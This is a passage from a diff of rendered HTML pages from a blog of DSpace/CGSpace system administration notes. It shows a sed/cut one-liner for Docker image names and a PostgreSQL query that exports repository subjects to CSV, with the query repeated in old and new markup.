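<ul>
<li>The one-liner works by squeezing the whitespace between repository and tag into colons and keeping the first two fields; an illustration with a made-up image line:</li>
</ul>
<pre tabindex="0"><code>$ echo &#39;nginx        1.21      4f380adfc10f   2 weeks ago   133MB&#39; | sed &#39;s/ \+/:/g&#39; | cut -d: -f1,2
nginx:1.21
</code></pre>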
<a href='https://alanorth.github.io/cgspace-notes/2021-08/'>Read more →</a>
@ -328,9 +328,9 @@ $ wc -l /tmp/2021-10-01-affiliations.txt
<ul>
<li>Export another list of ALL subjects on CGSpace, including AGROVOC and non-AGROVOC for Enrico:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">localhost/dspace63= &gt; \COPY (SELECT DISTINCT LOWER(text_value) AS subject, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (119, 120, 127, 122, 128, 125, 135, 203, 208, 210, 215, 123, 236, 242, 187) GROUP BY subject ORDER BY count DESC) to /tmp/2021-07-01-all-subjects.csv WITH CSV HEADER;
COPY 20994
</code></pre></div>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace63= &gt; \COPY (SELECT DISTINCT LOWER(text_value) AS subject, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (119, 120, 127, 122, 128, 125, 135, 203, 208, 210, 215, 123, 236, 242, 187) GROUP BY subject ORDER BY count DESC) to /tmp/2021-07-01-all-subjects.csv WITH CSV HEADER;
</span></span><span style="display:flex;"><span>COPY 20994
</span></span></code></pre></div>
<a href='https://alanorth.github.io/cgspace-notes/2021-07/'>Read more →</a>
</article>

Some files were not shown because too many files have changed in this diff